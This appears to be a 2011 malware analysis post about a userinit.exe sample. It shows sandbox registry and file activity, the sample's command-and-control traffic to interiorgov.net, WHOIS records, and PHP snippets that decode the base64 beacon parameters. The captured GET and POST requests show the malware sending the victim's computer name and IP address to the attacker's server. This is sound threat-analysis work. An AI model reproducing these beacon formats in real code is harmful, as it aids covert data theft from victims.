Key: [ HKLM\Software\Microsoft\Command Processor ], Value Name: [ CompletionChar ], Value: [ 64 ], 1 time Key: [ HKLM\Software\Microsoft\Command Processor ], Value Name: [ DefaultColor ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\Command Processor ], Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\Command Processor ], Value Name: [ PathCompletionChar ], Value: [ 64 ], 1 time Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ midimapper ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.iac2 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.imaadpcm ], Value: [ imaadp32.acm ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.l3acm ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.msadpcm ], Value: [ msadp32.acm ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.msaudio1 ], Value: [ ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.msg711 ], Value: [ ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.msg723 ], Value: [ msg723.acm ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.msgsm610 ], Value: [ msgsm32.acm ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.sl_anet ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ msacm.trspch ], Value: [ ], 3 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.I420 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.M261 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.M263 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.cvid ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.iv31 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.iv32 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.iv41 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.iv50 ], Value: [ ], 1 time Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.iyuv ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.mrle ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.msvc ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.uyvy ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.yuy2 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.yvu9 ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ vidc.yvyu ], Value: [ ], 2 times Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ], Value Name: [ wavemapper ], Value: [ ], 2 times Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ], Value Name: [ wheel ], Value: [ 1 ], 1 time Key: [ HKLM\System\CurrentControlSet\Control\Nls\Language Groups ], Value Name: [ 1 ], Value: [ 1 ], 1 time Key: [ HKLM\System\CurrentControlSet\Control\Nls\Locale ], Value Name: [ 00000C07 ], Value: [ 1 ], 1 time Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ], Value Name: [ ProductType ], Value: [ WinNT ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ], Value Name: [ CompletionChar ], Value: [ 9 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ], Value Name: [ DefaultColor ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ], Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Multimedia\Audio ], Value Name: [ SystemFormats ], Value: [ CD Quality,Radio Quality,Telephone Quality ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time [=============================================================================] 3.b) cmd.exe - File Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Files Deleted: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\userinit.e.exe ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Files Modified: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ nul ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Device Control Communication: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 1 time [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Memory Mapped Files: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ] File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ] File Name: [ C:\WINDOWS\WindowsShell.Manifest ] File Name: [ C:\WINDOWS\system32\MSACM32.dll ] File Name: [ C:\WINDOWS\system32\SHELL32.dll ] File Name: [ C:\WINDOWS\system32\ShimEng.dll ] File Name: [ C:\WINDOWS\system32\UxTheme.dll ] File Name: [ C:\WINDOWS\system32\WINMM.dll ] File Name: [ C:\WINDOWS\system32\comctl32.dll ] File Name: [ C:\Windows\AppPatch\sysmain.sdb ]

Network activity

Download  114.248.83.92userinitJan7-11pm.pcap 

Download 123.120.107.46userinitbeforeJan710pm.pcap

Download the Anubis generated pcap file 

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    DNS Queries:
        Name: [ globalization.interiorgov.net ], Query Type: [ DNS_TYPE_A ],
            Query Result: [ 123.120.107.46 ], Successful: [ 1 ], Protocol: [ udp ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    HTTP Conversations:

 to 123.120.107.46:80 - [ globalization.interiorgov.net ]
             Request: [ GET /windowsupdatev7/search?hl=UABDAA==&q=MQA5ADIALgAxADYAOAAuADAALgAyAA==&meta=Lg==&id=phqghumeaylnlfd ], Response: [ 200 "OK" ]
to 123.120.107.46:80 - [ globalization.interiorgov.net ]
             Request: [ GET /windowsupdatev7/search?hl=UABDAA==&q=MQA5ADIALgAxADYAOAAuADAALgAyAA==&meta=Li4=&id=xfircvscxggbwkf ], Response: [ 200 "OK" ]

Contents of the web server robots.txt file (thanks to Andre')

畂灲瀠潲祸攠牲牯›慦汩摥琠潣湮捥⁴潴朠潬慢楬慺楴湯椮瑮牥潩杲癯渮瑥㠺ര

Domain:     interiorgov.net - Domain History
Cache Date:     2011-01-03
Registrar:     NAME2HOST, INC. DBA NAME2HOST.COM

Server:     whois.name2host.com
Created:     2010-09-07
Updated:     2010-09-07
Expires:     2011-09-07
qingwa20102010@163.com
Domain name: INTERIORGOV.NET
   Updated Date: 2010-09-08
   Creation Date: 2010-09-08
   Expiration Date: 2011-09-08

Registrar of Record: NAME2HOST, INC.
Domain servers in listed order:
    DNS1.51.NET   118.144.82.171
    DNS2.51.NET   118.145.1.7


IP addresses
The hosting IP address of the domain keeps changing but within the same provider


IP Address 1 - As recorded on January 7, 2011

IP address 123.120.107.46

inetnum:      123.112.0.0 - 123.127.255.255
netname:      UNICOM-BJ
descr:        China Unicom Beijing province network
address:      No.21,Jin-Rong Street
address:      Beijing,100140
address:      P.R.China
phone:        +86-10-66259940
fax-no:       +86-10-66259764



person:       sun ying
address:      fu xing men nei da jie 97, Xicheng District
address:      Beijing 100800

There are usually 2-4 HTTP GET requests followed by one HTTP POST (12,000-20,000 bytes length), followed by many HTTP GET requests again. I did not observe more than one HTTP POST per binary execution. The strings in HTTP GET requests are identical except for the last part "id" of the string (see this code in the binary ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
/windowsupdatev7/search?hl=%s&q=%s&meta=%s&id=%s)

Example 1

GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Damyehwqnqrqpmxu HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Dnqduxwfnfozvsrt HTTP/1.1
POST /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Doejuvpvaboygpoe HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Dphqghumeaylnlfd HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Dsrenzkycxfxtlsg HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Dstmwcysyycqpevi HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Djjloovaowuxwhms HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Djjloovaowuxwhms HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dkeffmznimkkasvw HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dkjprepggxrpnrvy HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dxfircvscxggbwkf HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dylfpbnpljvrvipy HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dypsfadpooefxzbc HTTP/1.1
GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLi4%3D%26id%3Dypsfadpooefxzbc HTTP/1.1

Example 2 The strings sometimes retransmit [TCP Retransmission]  and you will see identical GET requests

**GET /win​dowsupda​tev7/sea​rch%3Fhl​%3DSABBA​E4AUwA%3​D%26q%3D​MQA5ADIA​ LgAxADYA​OAAuADIA​LgAyAA%3​D%3D%26m​eta%3DLg​%3D%3D%2​6id%3Dph​qghumeay​ lnlfd HT​TP/1.1

**GET /win​dowsupda​tev7/sea​rch%3Fhl​%3DSABBA​E4AUwA%3​D%26q%3D​MQA5ADIA​ LgAxADYA​OAAuADIA​LgAyAA%3​D%3D%26m​eta%3DLi​4%3D%26i​d%3Dxfir​cvscxggb​ wkf HTTP​/1.1

**GET /win​dowsupda​tev7/sea​rch%3Fhl​%3DSABBA​E4AUwA%3​D%26q%3D​MQA5ADIA​ LgAxADYA​OAAuADIA​LgAyAA%3​D%3D%26m​eta%3DLi​4%3D%26i​d%3Dxfir​cvscxggb​ wkf HTTP​/1.1

**POST /wi​ndowsupd​atev7/se​arch%3Fh​l%3DSABB​AE4AUwA%​3D%26q%3​DMQA5ADI​ ALgAxADY​AOAAuADI​ALgAyAA%​3D%3D%26​meta%3DM​DAwMGhIR​UwuMDk%3​D%26id%3​ Dlfdxfir​cvscxggb​ HTTP/1.​1

Strings can be decoded

echo urldecode("GET /windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AMQAxADYA%26meta%3DLg%3D%3D%26id%3Damyehwqnqrqpmxu HTTP/1.1");
?>
|||
GET /windowsupdatev7/search?hl=WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA&q=MQA3ADIALgAyADkALgAwAC4AMQAxADYA&meta=Lg==&id=amyehwqnqrqpmxu HTTP/1.1
   
without %, %3d - =, %26 - &
|||
 
echo "hl=".base64_decode("WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA")."\n";
echo "q=".base64_decode("MQA3ADIALgAyADkALgAwAC4AMQAxADYA")."\n";
echo "meta=".base64_decode("Lg==&")."\n";
echo "id=".base64_decode("amyehwqnqrqpmxu")."\n";
?>
|||
hl - compname(unicode string encoded with base64)
q - ip address(unicode string encoded with base64)
meta - directory where search(base64 encoded)
id - changing string, presumably a directory name on the victim's pc
|||
the end result
hl=XPSP3-R93-OFC20
q=172.29.0.116

As mentioned above, M​DAwMGhIR​UwuMDk in meta part of the URL string can be decoded as meta=0000hHEL.09

**POST /wi​ndowsupd​atev7/se​arch%3Fh​l%3DSABB​AE4AUwA%​3D%26q%3​DMQA5ADI​ ALgAxADY​AOAAuADI​ALgAyAA%​3D%3D%26​meta%3DM​DAwMGhIR​UwuMDk%3​D%26id%3​ Dlfdxfir​cvscxggb​ HTTP/1.​1. 

The last part -lfdxfir​cvscxggb​ - is changing with each GET request and is possibly an encoded directories names on the victim pc (thanks to Villy for his help with these)

IP Address 2 - Changed between 10 and 11pm January 7, 2011 

IP Address:   114.248.83.92 

NetRange:     114.0.0.0 - 114.255.255.255
netname:      UNICOM-BJ
descr:        China Unicom Beijing province network
address:      No.21,Jin-Rong Street
address:      Beijing,100140
address:      P.R.China
phone:        +86-10-66259940
fax-no:       +86-10-66259764
person:       sun ying
address:      fu xing men nei da jie 97, Xicheng District
address:      Beijing 100800

SSL traffic started for environment.interiorgov.net domain, and unlike globalization.interiorgov.net, environment subdomain is not  hardcoded in the binary downloaded from the server (see 114.248.83.92userinitJan7-11pm.pcap tcp.stream eq 3 - correction from Kyle Yung), all communications always start with globalization.interiorgov.net. Also, the SSL traffic was observed only for 114.248.83.92

Example of SSL traffic

The following conversation between the server and the victim pc also takes place (thanks to Andre' DiMino for the capture :)

IP Address 3 - Changed before 9 am on January 8, 2011  

IP Address:   123.120.106.88
inetnum:      123.112.0.0 - 123.127.255.255
netname:      UNICOM-BJ
descr:        China Unicom Beijing province network
address:      No.21,Jin-Rong Street
address:      Beijing,100140
address:      P.R.China
phone:        +86-10-66259940
fax-no:       +86-10-66259764
person:       sun ying
address:      fu xing men nei da jie 97, Xicheng District
address:      Beijing 100800

The hosting history screenshot posted below does not include all the changes for the past two days